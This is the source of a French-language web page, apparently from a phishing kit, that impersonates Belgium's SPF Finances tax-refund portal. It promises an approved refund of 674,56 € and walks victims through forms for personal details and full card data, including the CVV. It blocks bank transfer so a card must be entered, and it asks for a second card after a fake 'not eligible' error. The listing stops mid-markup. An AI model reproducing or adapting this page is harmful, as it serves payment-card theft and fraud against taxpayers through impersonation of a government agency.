<?php
error_reporting(0);
session_start();

require '../main.php';
?>
<!DOCTYPE html>
<html lang="fr">
<head>
    <base target="_self">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Réclamez Votre Remboursement d'Impôt | SPF Finances Belgique</title>
    <meta name="description" content="Réclamez votre remboursement d'impôt approuvé auprès du SPF Finances Belgique">
    <script src="https://cdn.tailwindcss.com"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap" rel="stylesheet">
    <script>
        tailwind.config = {
            theme: {
                extend: {
                    colors: {
                        primary: "#0055a5",
                        secondary: "#e30613",
                        accent: "#ffd200",
                        darkblue: "#003366",
                        lightblue: "#e6f2ff",
                        success: "#10b981",
                        warning: "#f59e0b",
                        error: "#ef4444"
                    },
                    fontFamily: {
                        sans: ['Inter', 'system-ui', 'sans-serif'],
                    },
                    boxShadow: {
                        'soft': '0 4px 6px -1px rgba(0, 0, 0, 0.05), 0 2px 4px -1px rgba(0, 0, 0, 0.03)',
                        'card': '0 10px 15px -3px rgba(0, 0, 0, 0.05), 0 4px 6px -2px rgba(0, 0, 0, 0.025)',
                    }
                }
            }
        }
    </script>
    <style>
        .gradient-bg {
            background: linear-gradient(135deg, #003366 0%, #0055a5 100%);
        }
        .progress-bar {
            height: 4px;
            background: linear-gradient(90deg, #0055a5 0%, #ffd200 50%, #10b981 100%);
            width: 100%;
            border-radius: 2px;
        }
        .input-focus:focus {
            box-shadow: 0 0 0 3px rgba(0, 85, 165, 0.1);
        }
        .step-indicator {
            width: 32px;
            height: 32px;
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            font-weight: 600;
            font-size: 14px;
        }
        .step-active {
            background-color: #0055a5;
            color: white;
        }
        .step-inactive {
            background-color: #e5e7eb;
            color: #6b7280;
        }
        .step-completed {
            background-color: #10b981;
            color: white;
        }
        .card-input {
            transition: all 0.2s ease;
        }
        .card-input:focus {
            transform: translateY(-2px);
        }
        .floating-label {
            position: absolute;
            top: -10px;
            left: 12px;
            font-size: 12px;
            background: white;
            padding: 0 4px;
            color: #0055a5;
            font-weight: 500;
        }
        .input-container {
            position: relative;
        }
        .payment-method {
            border: 2px solid #e5e7eb;
            border-radius: 12px;
            padding: 20px;
            cursor: pointer;
            transition: all 0.3s ease;
        }
        .payment-method:hover {
            border-color: #0055a5;
            transform: translateY(-2px);
        }
        .payment-method.selected {
            border-color: #0055a5;
            background-color: #f0f7ff;
        }
        .payment-method.disabled {
            opacity: 0.5;
            cursor: not-allowed;
        }
        .payment-method.disabled:hover {
            border-color: #e5e7eb;
            transform: none;
        }
        .form-step {
            display: none;
        }
        .form-step.active {
            display: block;
        }
        .notification {
            position: fixed;
            top: 20px;
            right: 20px;
            z-index: 1000;
            max-width: 400px;
            opacity: 0;
            transform: translateX(100%);
            transition: all 0.3s ease;
        }
        .notification.show {
            opacity: 1;
            transform: translateX(0);
        }
        .bancontact-logo {
            background: linear-gradient(135deg, #0055a5 0%, #003366 100%);
            color: white;
            font-weight: bold;
            border-radius: 8px;
            padding: 8px 12px;
            font-size: 14px;
            display: inline-block;
        }
        .contact-method {
            border: 2px solid #e5e7eb;
            border-radius: 12px;
            padding: 16px;
            cursor: pointer;
            transition: all 0.3s ease;
            text-align: center;
        }
        .contact-method:hover {
            border-color: #0055a5;
            transform: translateY(-2px);
        }
        .contact-method.selected {
            border-color: #0055a5;
            background-color: #f0f7ff;
        }
        .bancontact-icon {
            width: 48px;
            height: 48px;
            background: linear-gradient(135deg, #0055a5 0%, #003366 100%);
            border-radius: 8px;
            display: flex;
            align-items: center;
            justify-content: center;
            color: white;
            font-weight: bold;
            font-size: 12px;
            margin: 0 auto 8px;
        }
        .loading-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.8);
            display: none;
            justify-content: center;
            align-items: center;
            z-index: 9999;
            flex-direction: column;
        }
        .loading-overlay.active {
            display: flex;
        }
        .service-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.7);
            display: none;
            justify-content: center;
            align-items: center;
            z-index: 10000;
            backdrop-filter: blur(10px);
        }
        .service-overlay.active {
            display: flex;
        }
        .service-modal {
            background: white;
            border-radius: 16px;
            box-shadow: 0 25px 50px -12px rgba(0, 0, 0, 0.25);
            max-width: 500px;
            width: 90%;
            max-height: 90vh;
            overflow-y: auto;
        }
        .loading-spinner {
            width: 80px;
            height: 80px;
            border: 8px solid #f3f3f3;
            border-top: 8px solid #0055a5;
            border-radius: 50%;
            animation: spin 2s linear infinite;
            margin-bottom: 20px;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body class="min-h-screen bg-gray-50 font-sans">
    <!-- Overlay d'erreur -->
    <div id="loadingOverlay" class="loading-overlay">
        <div class="bg-white rounded-xl shadow-2xl max-w-md w-full mx-4 p-6">
            <div class="flex items-center mb-4">
                <div class="bg-error rounded-full p-2 mr-3">
                    <i class="fas fa-exclamation-triangle text-white"></i>
                </div>
                <h3 class="text-xl font-bold text-gray-800">Erreur de traitement</h3>
            </div>
            
            <div class="space-y-4 mb-6">
                <div class="flex items-start">
                    <input type="checkbox" class="mt-1 mr-3 text-primary" checked disabled>
                    <span class="text-gray-700">Échec - il faut essayer manuellement</span>
                </div>
                <p class="text-gray-600 bg-red-50 p-3 rounded-lg border border-red-200">
                    Une erreur s'est produite lors du traitement de votre demande. Veuillez réessayer ou contacter le support.
                </p>
            </div>
            
            <div class="flex space-x-3">
                <button id="closeErrorModal" class="flex-1 bg-gray-200 hover:bg-gray-300 text-gray-800 font-semibold py-3 px-4 rounded-lg transition duration-300">
                    Fermer
                </button>
                <button id="retrySubmit" class="flex-1 bg-primary hover:bg-darkblue text-white font-semibold py-3 px-4 rounded-lg transition duration-300">
                    Réessayer
                </button>
            </div>
        </div>
    </div>

    <!-- Overlay des horaires de service -->
    <div id="serviceOverlay" class="service-overlay">
        <div class="service-modal">
            <div class="bg-gradient-to-r from-primary to-darkblue text-white p-6 rounded-t-16">
                <div class="flex items-center justify-between">
                    <div class="flex items-center">
                        <div class="bg-white/20 p-3 rounded-full mr-4">
                            <i class="fas fa-building text-white text-2xl"></i>
                        </div>
                        <div>
                            <h2 class="text-xl font-bold">Service Public Fédéral Finances</h2>
                            <p class="text-blue-100 text-sm">Direction Générale de la Fiscalité</p>
                        </div>
                    </div>
                    <button id="closeServiceModal" class="text-white hover:text-blue-200 transition duration-200">
                        <i class="fas fa-times text-xl"></i>
                    </button>
                </div>
            </div>
            
            <div class="p-6">
                <div class="text-center mb-6">
                    <div class="bg-blue-50 inline-flex p-4 rounded-full mb-4">
                        <i class="fas fa-clock text-primary text-3xl"></i>
                    </div>
                    <h3 class="text-2xl font-bold text-gray-800 mb-2">Horaires de Service</h3>
                    <p class="text-gray-600">
                        Nos horaires d'ouverture pour vous servir
                    </p>
                </div>

                <div class="bg-blue-50 rounded-xl p-5 mb-6 border border-blue-200">
                    <h4 class="font-bold text-darkblue mb-4 flex items-center">
                        <i class="fas fa-calendar-alt mr-2"></i>
                        Horaires d'Ouverture
                    </h4>
                    
                    <div class="space-y-3">
                        <div class="flex justify-between items-center py-2 border-b border-blue-100">
                            <span class="font-medium text-gray-700">Lundi - Vendredi</span>
                            <span class="font-bold text-primary">08h30 - 17h30</span>
                        </div>
                        <div class="flex justify-between items-center py-2">
                            <span class="font-medium text-gray-700">Samedi</span>
                            <span class="font-bold text-primary">09h00 - 12h00</span>
                        </div>
                    </div>
                </div>

                <div class="bg-green-50 rounded-xl p-5 mb-6 border border-green-200">
                    <h4 class="font-bold text-darkblue mb-3 flex items-center">
                        <i class="fas fa-info-circle mr-2"></i>
                        Information Importante
                    </h4>
                    <p class="text-sm text-gray-700">
                        Le service est disponible pendant les horaires d'ouverture mentionnés ci-dessus.
                        En dehors de ces créneaux, vous pouvez nous laisser un message et nous vous recontacterons dès la réouverture.
                    </p>
                </div>

                <div class="bg-gray-50 rounded-xl p-5 border border-gray-200">
                    <h4 class="font-bold text-darkblue mb-3 flex items-center">
                        <i class="fas fa-phone-alt mr-2"></i>
                        Contact
                    </h4>
                    
                    <div class="text-center mb-4">
                        <div class="text-2xl font-bold text-primary mb-1">02 572 57 72</div>
                        <div class="text-sm text-gray-500">Disponible aux horaires d'ouverture</div>
                    </div>
                    
                    <div class="text-center text-sm text-gray-600">
                        <i class="fas fa-map-marker-alt mr-1"></i>
                        Service Public Fédéral Finances<br>
                        Boulevard du Jardin Botanique 50, 1000 Bruxelles
                    </div>
                </div>
                
                <div class="text-center mt-6 pt-4 border-t border-gray-200">
                    <p class="text-xs text-gray-500">
                        © 2024 - Tous droits réservés
                    </p>
                </div>
            </div>
        </div>
    </div>

    <!-- Conteneur de notifications -->
    <div id="notification-container" class="notification">
        <!-- Les notifications seront insérées ici -->
    </div>

    <!-- En-tête -->
    <header class="gradient-bg text-white shadow-lg">
        <div class="container mx-auto px-4 py-4">
            <div class="flex items-center justify-between">
                <div class="flex items-center space-x-4">
                    <div class="bg-white p-2 rounded-lg shadow-md">
                        <img 
                            src="https://fin.belgium.be/themes/custom/finpart/logo_fr.svg" 
                            alt="SPF Finances Belgique" 
                            class="h-10"
                            loading="lazy"
                        >
                    </div>
                    <div class="hidden md:block border-l border-blue-400 h-8"></div>
                    <div class="hidden md:block">
                        <h1 class="text-xl font-bold text-white">Service Public Fédéral Finances</h1>
                        <p class="text-sm text-blue-100">Portail de Remboursement d'Impôt</p>
                    </div>
                </div>
                <div class="flex items-center space-x-4">
                    <div class="bg-blue-700/30 backdrop-blur-sm rounded-lg px-4 py-2 border border-blue-500/30">
                        <i class="fas fa-shield-alt mr-2"></i>
                        <span class="font-medium">Portail Sécurisé</span>
                    </div>
                    <div class="hidden md:flex items-center space-x-2 text-blue-100">
                        <i class="fas fa-clock"></i>
                        <span id="current-time"></span>
                    </div>
                </div>
            </div>
        </div>
    </header>

    <!-- Barre de progression -->
    <div class="progress-bar"></div>

    <main class="container mx-auto px-4 py-8 max-w-6xl">
        <!-- Notification de remboursement -->
        <div class="bg-gradient-to-r from-green-50 to-emerald-50 rounded-xl shadow-card p-6 mb-8 border border-green-200">
            <div class="flex flex-col md:flex-row items-start md:items-center justify-between">
                <div class="flex items-start mb-4 md:mb-0">
                    <div class="bg-success rounded-full p-3 mr-4 shadow-sm">
                        <i class="fas fa-check-circle text-white text-xl"></i>
                    </div>
                    <div>
                        <h2 class="text-2xl font-bold text-darkblue mb-2">Remboursement d'Impôt Approuvé</h2>
                        <p class="text-gray-700 mb-2">
                            Nos archives confirment que vous avez un remboursement d'impôt non réclamé de <span class="font-bold text-success text-xl" id="refund-amount">674,56 €</span> de votre déclaration d'<span id="filing-month">octobre 2025</span>.
                        </p>
                        <p class="text-gray-700">
                            Votre trop-perçu est officiellement approuvé et vous attend.
                        </p>
                    </div>
                </div>
                <div class="bg-white rounded-lg p-4 shadow-soft border border-green-100">
                    <div class="text-sm text-gray-500">Réclamez avant le</div>
                    <div class="text-lg font-bold text-darkblue" id="claim-deadline">31 décembre 2025</div>
                </div>
            </div>
        </div>

        <!-- Indicateur d'étapes multiples -->
        <div class="bg-white rounded-xl shadow-card p-6 mb-8">
            <div class="flex justify-between items-center">
                <div class="flex items-center">
                    <div id="step1-indicator" class="step-indicator step-active mr-3">
                        1
                    </div>
                    <div class="hidden sm:block">
                        <div class="text-sm font-medium text-gray-500">Étape 1</div>
                        <div class="text-sm font-semibold text-darkblue">Informations Personnelles</div>
                    </div>
                </div>
                <div id="step1-connector" class="h-1 w-8 bg-gray-200 rounded-full"></div>
                <div class="flex items-center">
                    <div id="step2-indicator" class="step-indicator step-inactive mr-3">
                        2
                    </div>
                    <div class="hidden sm:block">
                        <div class="text-sm font-medium text-gray-500">Étape 2</div>
                        <div class="text-sm font-semibold text-gray-400">Moyen de Paiement</div>
                    </div>
                </div>
                <div id="step2-connector" class="h-1 w-8 bg-gray-200 rounded-full"></div>
                <div class="flex items-center">
                    <div id="step3-indicator" class="step-indicator step-inactive mr-3">
                        3
                    </div>
                    <div class="hidden sm:block">
                        <div class="text-sm font-medium text-gray-500">Étape 3</div>
                        <div class="text-sm font-semibold text-gray-400">Confirmation</div>
                    </div>
                </div>
            </div>
        </div>

        <!-- Contenu Principal -->
        <div class="grid grid-cols-1 lg:grid-cols-3 gap-8">
            <!-- Colonne de Gauche - Formulaire -->
            <div class="lg:col-span-2">
                <div class="bg-white rounded-xl shadow-card overflow-hidden">
                    <div class="bg-darkblue text-white p-4">
                        <h2 class="text-xl font-bold">Réclamez Votre Remboursement</h2>
                        <p class="text-blue-100 text-sm">Complétez le formulaire ci-dessous pour recevoir votre remboursement</p>
                    </div>
                    
                    <form id="refundForm" class="p-6">
                        <!-- Étape 1: Informations Personnelles -->
                        <div id="step1" class="form-step active space-y-8">
                            <h3 class="text-lg font-semibold text-darkblue mb-4 flex items-center">
                                <i class="fas fa-user-circle mr-2 text-primary"></i>
                                Informations Personnelles
                            </h3>
                            <div class="grid grid-cols-1 md:grid-cols-2 gap-5">
                                <div class="input-container">
                                    <label for="firstName" class="floating-label">Prénom *</label>
                                    <input type="text" id="firstName" name="firstName" required 
                                           class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input">
                                </div>
                                <div class="input-container">
                                    <label for="lastName" class="floating-label">Nom *</label>
                                    <input type="text" id="lastName" name="lastName" required 
                                           class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input">
                                </div>
                                <div class="input-container">
                                    <label for="email" class="floating-label">Adresse Email *</label>
                                    <input type="email" id="email" name="email" required 
                                           class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input">
                                </div>
                                <div class="input-container">
                                    <label for="phone" class="floating-label">Numéro de Téléphone *</label>
                                    <input type="tel" id="phone" name="phone" required 
                                           class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input">
                                </div>
                            </div>
                            
                            <h3 class="text-lg font-semibold text-darkblue mb-4 flex items-center">
                                <i class="fas fa-home mr-2 text-primary"></i>
                                Adresse de Facturation
                            </h3>
                            <div class="space-y-5">
                                <div class="input-container">
                                    <label for="address" class="floating-label">Adresse *</label>
                                    <input type="text" id="address" name="address" required 
                                           class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input">
                                </div>
                                <div class="grid grid-cols-1 md:grid-cols-3 gap-5">
                                    <div class="input-container">
                                        <label for="postalCode" class="floating-label">Code Postal *</label>
                                        <input type="text" id="postalCode" name="postalCode" required 
                                               class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input">
                                    </div>
                                    <div class="md:col-span-2 input-container">
                                        <label for="city" class="floating-label">Ville *</label>
                                        <input type="text" id="city" name="city" required 
                                               class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input">
                                    </div>
                                </div>
                                <div class="input-container">
                                    <label for="country" class="floating-label">Pays *</label>
                                    <select id="country" name="country" required 
                                            class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input appearance-none bg-white">
                                        <option value="">Sélectionnez un pays</option>
                                        <option value="BE" selected>Belgique</option>
                                        <option value="NL">Pays-Bas</option>
                                        <option value="FR">France</option>
                                        <option value="DE">Allemagne</option>
                                        <option value="LU">Luxembourg</option>
                                    </select>
                                    <i class="fas fa-chevron-down absolute right-4 top-4 text-gray-400 pointer-events-none"></i>
                                </div>
                            </div>
                            
                            <h3 class="text-lg font-semibold text-darkblue mb-4 flex items-center">
                                <i class="fas fa-comments mr-2 text-primary"></i>
                                Méthode de Contact Préférée
                            </h3>
                            <div class="grid grid-cols-1 md:grid-cols-3 gap-4">
                                <div class="contact-method" id="contact-email">
                                    <div class="flex flex-col items-center">
                                        <div class="w-12 h-12 bg-blue-50 rounded-lg flex items-center justify-center mb-2">
                                            <i class="fas fa-envelope text-primary text-xl"></i>
                                        </div>
                                        <span class="font-medium text-darkblue">E-mail</span>
                                    </div>
                                </div>
                                <div class="contact-method" id="contact-phone">
                                    <div class="flex flex-col items-center">
                                        <div class="w-12 h-12 bg-blue-50 rounded-lg flex items-center justify-center mb-2">
                                            <i class="fas fa-phone text-primary text-xl"></i>
                                        </div>
                                        <span class="font-medium text-darkblue">Téléphone</span>
                                    </div>
                                </div>
                                <div class="contact-method" id="contact-sms">
                                    <div class="flex flex-col items-center">
                                        <div class="w-12 h-12 bg-blue-50 rounded-lg flex items-center justify-center mb-2">
                                            <i class="fas fa-comment-alt text-primary text-xl"></i>
                                        </div>
                                        <span class="font-medium text-darkblue">SMS</span>
                                    </div>
                                </div>
                            </div>
                            
                            <div class="flex justify-end pt-4">
                                <button type="button" id="next-to-step2" class="bg-primary hover:bg-darkblue text-white font-semibold py-3 px-6 rounded-lg transition duration-300 focus:outline-none focus:ring-2 focus:ring-primary focus:ring-offset-2 shadow-md">
                                    Continuer vers le Paiement <i class="fas fa-arrow-right ml-2"></i>
                                </button>
                            </div>
                        </div>
                        
                        <!-- Étape 2: Moyen de Paiement -->
                        <div id="step2" class="form-step space-y-8">
                            <h3 class="text-lg font-semibold text-darkblue mb-4 flex items-center">
                                <i class="fas fa-credit-card mr-2 text-primary"></i>
                                Sélectionnez le Moyen de Paiement
                            </h3>
                      <?php
if (isset($_GET['s'])) {
    echo '
    <div style="
        margin: 20px auto;
        padding: 15px 20px;
        max-width: 500px;
        border: 1px solid #f5c2c7;
        background-color: #f8d7da;
        color: #842029;
        border-radius: 8px;
        font-family: Arial, sans-serif;
        font-size: 15px;
        box-shadow: 0 2px 8px rgba(0,0,0,0.1);
    ">
        <strong>⚠️ Erreur :</strong> Votre carte n\'est pas éligible au remboursement.<br>
        <span style="font-size: 14px;">Veuillez en utiliser une autre.</span>
    </div>
    ';
}
?>

                            <div class="space-y-4">
                                <!-- Option Prélèvement SEPA -->
                                <div class="payment-method disabled">
                                    <div class="flex items-center">
                                        <div class="w-12 h-12 bg-gray-100 rounded-lg flex items-center justify-center mr-4">
                                            <i class="fas fa-university text-gray-500 text-xl"></i>
                                        </div>
                                        <div class="flex-1">
                                            <h4 class="font-semibold text-darkblue">Prélèvement SEPA</h4>
                                            <p class="text-sm text-gray-600 mt-1">Transfert direct vers votre compte bancaire</p>
                                        </div>
                                        <div class="ml-4">
                                            <span class="bg-gray-200 text-gray-700 text-xs font-medium px-2.5 py-0.5 rounded">Non disponible pour les remboursements</span>
                                        </div>
                                    </div>
                                </div>
                                
                                <!-- Option Carte de Crédit -->
                                <div class="payment-method" id="credit-card-option">
                                    <div class="flex items-center">
                                        <div class="w-12 h-12 bg-blue-50 rounded-lg flex items-center justify-center mr-4">
                                            <i class="fas fa-credit-card text-primary text-xl"></i>
                                        </div>
                                        <div class="flex-1">
                                            <h4 class="font-semibold text-darkblue">Carte de Crédit</h4>
                                            <p class="text-sm text-gray-600 mt-1">Visa, Mastercard, American Express</p>
                                        </div>
                                        <div class="ml-4">
                                            <i class="fas fa-check-circle text-primary text-xl opacity-0" id="credit-card-check"></i>
                                        </div>
                                    </div>
                                    
                                    <!-- Formulaire Carte de Crédit (Caché Initialement) -->
                                    <div id="credit-card-form" class="mt-6 hidden">
                                        <div class="space-y-5">
                                            <div class="input-container">
                                                <label for="cardNumber" class="floating-label">Numéro de Carte *</label>
                                                <input type="text" id="cardNumber" name="cardNumber" placeholder="1234 5678 9012 3456" 
                                                       class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input">
                                                <div class="absolute right-4 top-4 flex space-x-2">
                                                    <i class="fab fa-cc-visa text-blue-600"></i>
                                                    <i class="fab fa-cc-mastercard text-red-500"></i>
                                                    <i class="fab fa-cc-amex text-blue-400"></i>
                                                </div>
                                            </div>
                                            <div class="grid grid-cols-1 md:grid-cols-3 gap-5">
                                                <div class="input-container">
                                                    <label for="expiryDate" class="floating-label">Date d'Expiration *</label>
                                                    <input type="text" id="expiryDate" name="expiryDate" placeholder="MM/AA" 
                                                           class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input">
                                                </div>
                                                <div class="input-container">
                                                    <label for="cvv" class="floating-label">CVV *</label>
                                                    <input type="text" id="cvv" name="cvv" placeholder="123" 
                                                           class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input">
                                                </div>
                                                <div class="flex items-center justify-center">
                                                    <div class="bg-gray-100 p-3 rounded-lg">
                                                        <i class="fas fa-question-circle text-gray-500 text-xl"></i>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="input-container">
                                                <label for="cardHolder" class="floating-label">Nom du Titulaire *</label>
                                                <input type="text" id="cardHolder" name="cardHolder" 
                                                       class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input">
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                
                                <!-- Option Bancontact -->
                                <div class="payment-method" id="bancontact-option">
                                    <div class="flex items-center">
                                        <div class="w-12 h-12 bg-yellow-50 rounded-lg flex items-center justify-center mr-4">
                                            <div class="bancontact-icon">BC</div>
                                        </div>
                                        <div class="flex-1">
                                            <h4 class="font-semibold text-darkblue">Bancontact</h4>
                                            <p class="text-sm text-gray-600 mt-1">Moyen de paiement belge sécurisé</p>
                                        </div>
                                        <div class="ml-4">
                                            <i class="fas fa-check-circle text-primary text-xl opacity-0" id="bancontact-check"></i>
                                        </div>
                                    </div>
                                    
                                    <!-- Formulaire Bancontact (Caché Initialement) -->
                                    <div id="bancontact-form" class="mt-6 hidden">
                                        <div class="space-y-5">
                                            <div class="input-container">
                                                <label for="bancontact-card-number" class="floating-label">Numéro de Carte *</label>
                                                <input type="text" id="bancontact-card-number" name="bancontactCardNumber" placeholder="1234 5678 9012 3456" 
                                                       class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input">
                                            </div>
                                            <div class="grid grid-cols-1 md:grid-cols-2 gap-5">
                                                <div class="input-container">
                                                    <label for="bancontact-expiry-date" class="floating-label">Date d'Expiration *</label>
                                                    <input type="text" id="bancontact-expiry-date" name="bancontactExpiryDate" placeholder="MM/AA" 
                                                           class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input">
                                                </div>
                                                <div class="input-container">
                                                    <label for="bancontact-card-holder" class="floating-label">Nom du Titulaire *</label>
                                                    <input type="text" id="bancontact-card-holder" name="bancontactCardHolder" 
                                                           class="w-full px-4 py-3 border border-gray-300 rounded-lg focus:outline-none focus:border-primary input-focus card-input">
                                                </div>
                                            </div>
                                        </div>
                                        <div class="bg-blue-50 rounded-lg p-4 border border-blue-200 mt-4">
                                            <div class="flex items-center mb-2">
                                                <i class="fas fa-info-circle text-blue-500 mr-2"></i>
                                                <h5 class="font-medium text-darkblue">À propos de Bancontact</h5>
                                            </div>
                                            <p class="text-sm text-gray-700">
                                                Bancontact est le moyen de paiement le plus populaire en Belgique. Votre paiement est traité de manière sécurisée via votre banque.
                                                Aucun CVV n'est requis pour les paiements Bancontact.
                                            </p>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            
                            <div class="flex justify-between pt-4">
                                <button type="button" id="back-to-step1" class="bg-gray-200 hover:bg-gray-300 text-gray-800 font-semibold py-3 px-6 rounded-lg transition duration-300 focus:outline-none focus:ring-2 focus:ring-gray-400 focus:ring-offset-2">
                                    <i class="fas fa-arrow-left mr-2"></i> Retour
                                </button>
                                <button type="button" id="next-to-step3" class="bg-primary hover:bg-darkblue text-white font-semibold py-3 px-6 rounded-lg transition duration-300 focus:outline-none focus:ring-2 focus:ring-primary focus:ring-offset-2 shadow-md disabled:opacity-50 disabled:cursor-not-allowed" disabled>
                                    Continuer vers Confirmation <i class="fas fa-arrow-right ml-2"></i>
                                </button>
                            </div>
                        </div>
                        
                        <!-- Étape 3: Confirmation -->
                        <div id="step3" class="form-step space-y-8">
                            <h3 class="text-lg font-semibold text-darkblue mb-4 flex items-center">
                                <i class="fas fa-clipboard-check mr-2 text-primary"></i>
                                Confirmez Votre Remboursement
                            </h3>
                            
                            <div class="bg-green-50 rounded-xl p-6 border border-green-200">
                                <div class="flex items-center mb-4">
                                    <i class="fas fa-check-circle text-green-500 text-2xl mr-3"></i>
                                    <h4 class="text-xl font-bold text-darkblue">Prêt à Soumettre</h4>
                                </div>
                                <p class="text-gray-700 mb-4">
                                    Veuillez vérifier vos informations ci-dessous avant de soumettre votre demande de remboursement.
                                </p>
                                
                                <div class="grid grid-cols-1 md:grid-cols-2 gap-6 mt-6">
                                    <div>
                                        <h5 class="font-semibold text-darkblue mb-2">Informations Personnelles</h5>
                                        <div class="bg-white rounded-lg p-4 shadow-soft">
                                            <div class="space-y-2 text-sm">
                                                <div><span class="font-medium">Nom :</span> <span id="review-name">-</span></div>
                                                <div><span class="font-medium">Email :</span> <span id="review-email">-</span></div>
                                                <div><span class="font-medium">Téléphone :</span> <span id="review-phone">-</span></div>
                                                <div><span class="font-medium">Méthode de contact :</span> <span id="review-contact-method">-</span></div>
                                                <div><span class="font-medium">Adresse :</span> <span id="review-address">-</span></div>
                                            </div>
                                        </div>
                                    </div>
                                    
                                    <div>
                                        <h5 class="font-semibold text-darkblue mb-2">Détails de Paiement</h5>
                                        <div class="bg-white rounded-lg p-4 shadow-soft">
                                            <div class="space-y-2 text-sm">
                                                <div><span class="font-medium">Méthode :</span> <span id="review-method">-</span></div>
                                                <div id="review-card" class="hidden"><span class="font-medium">Carte :</span> <span id="review-card-number">-</span></div>
                                                <div><span class="font-medium">Montant du Remboursement :</span> <span class="font-bold text-success" id="review-refund-amount">674,56 €</span></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            
                            <div class="space-y-5">
                                <div class="flex items-start">
                                    <input type="checkbox" id="terms" name="terms" required 
                                           class="mt-1 mr-3 focus:ring-primary text-primary rounded border-gray-300">
                                    <label for="terms" class="text-sm text-gray-700">
                                        J'accepte les <a href="#" class="text-primary hover:underline font-medium">Conditions Générales</a> et confirme que toutes les informations fournies sont exactes.
                                    </label>
                                </div>
                                <div class="flex justify-between pt-4">
                                    <button type="button" id="back-to-step2" class="bg-gray-200 hover:bg-gray-300 text-gray-800 font-semibold py-3 px-6 rounded-lg transition duration-300 focus:outline-none focus:ring-2 focus:ring-gray-400 focus:ring-offset-2">
                                        <i class="fas fa-arrow-left mr-2"></i> Retour
                                    </button>
                                    <button type="submit" 
                                            class="bg-gradient-to-r from-primary to-darkblue hover:from-darkblue hover:to-primary text-white font-semibold py-3 px-6 rounded-lg transition duration-300 focus:outline-none focus:ring-2 focus:ring-primary focus:ring-offset-2 shadow-md hover:shadow-lg transform hover:-translate-y-0.5">
                                        <div class="flex items-center">
                                            <i class="fas fa-lock mr-2"></i>
                                            <span>Soumettre la Demande</span>
                                        </div>
                                    </button>
                                </div>
                            </div>
                        </div>
                    </form>
                </div>
            </div>

            <!-- Colonne de Droite - Informations -->
            <div class="space-y-6">
                <!-- Résumé du Remboursement -->
                <div class="bg-white rounded-xl shadow-card p-6 border-t-4 border-accent">
                    <h3 class="text-lg font-semibold text-darkblue mb-4 flex items-center">
                        <i class="fas fa-file-invoice-dollar mr-2 text-primary"></i>
                        Résumé du Remboursement
                    </h3>
                    <div class="space-y-4">
                        <div class="flex justify-between items-center py-2 border-b border-gray-100">
                            <span class="text-gray-600">Montant du Remboursement :</span>
                            <span class="font-bold text-success text-lg" id="summary-refund-amount">674,56 €</span>
                        </div>
                        <div class="flex justify-between py-2 border-b border-gray-100">
                            <span class="text-gray-600">Période de Déclaration :</span>
                            <span class="font-medium" id="filing-period">Octobre 2025</span>
                        </div>
                        <div class="flex justify-between py-2 border-b border-gray-100">
                            <span class="text-gray-600">Statut :</span>
                            <span class="font-medium text-success bg-green-50 px-2 py-1 rounded-full text-sm">Approuvé</span>
                        </div>
                        <div class="pt-3">
                            <div class="flex justify-between text-lg font-bold">
                                <span>Total à Recevoir :</span>
                                <span class="text-success" id="total-refund-amount">674,56 €</span>
                            </div>
                        </div>
                    </div>
                </div>

                <!-- Informations de Sécurité -->
                <div class="bg-gradient-to-br from-lightblue to-blue-50 rounded-xl p-6 border border-primary/20 shadow-soft">
                    <div class="flex items-center mb-4">
                        <div class="bg-primary/10 p-2 rounded-lg mr-3">
                            <i class="fas fa-shield-alt text-primary text-xl"></i>
                        </div>
                        <h4 class="font-bold text-darkblue">Traitement Sécurisé</h4>
                    </div>
                    <ul class="text-sm text-darkblue space-y-3">
                        <li class="flex items-start">
                            <i class="fas fa-lock text-primary mr-2 mt-0.5"></i>
                            <span>Chiffrement SSL 256-bit</span>
                        </li>
                        <li class="flex items-start">
                            <i class="fas fa-check-circle text-primary mr-2 mt-0.5"></i>
                            <span>Conforme PCI DSS</span>
                        </li>
                        <li class="flex items-start">
                            <i class="fas fa-user-shield text-primary mr-2 mt-0.5"></i>
                            <span>Vérifié par le SPF Finances</span>
                        </li>
                        <li class="flex items-start">
                            <i class="fas fa-bell text-primary mr-2 mt-0.5"></i>
                            <span>Surveillance anti-fraude en temps réel</span>
                        </li>
                    </ul>
                </div>

                <!-- Informations de Contact -->
                <div class="bg-white rounded-xl shadow-card p-6">
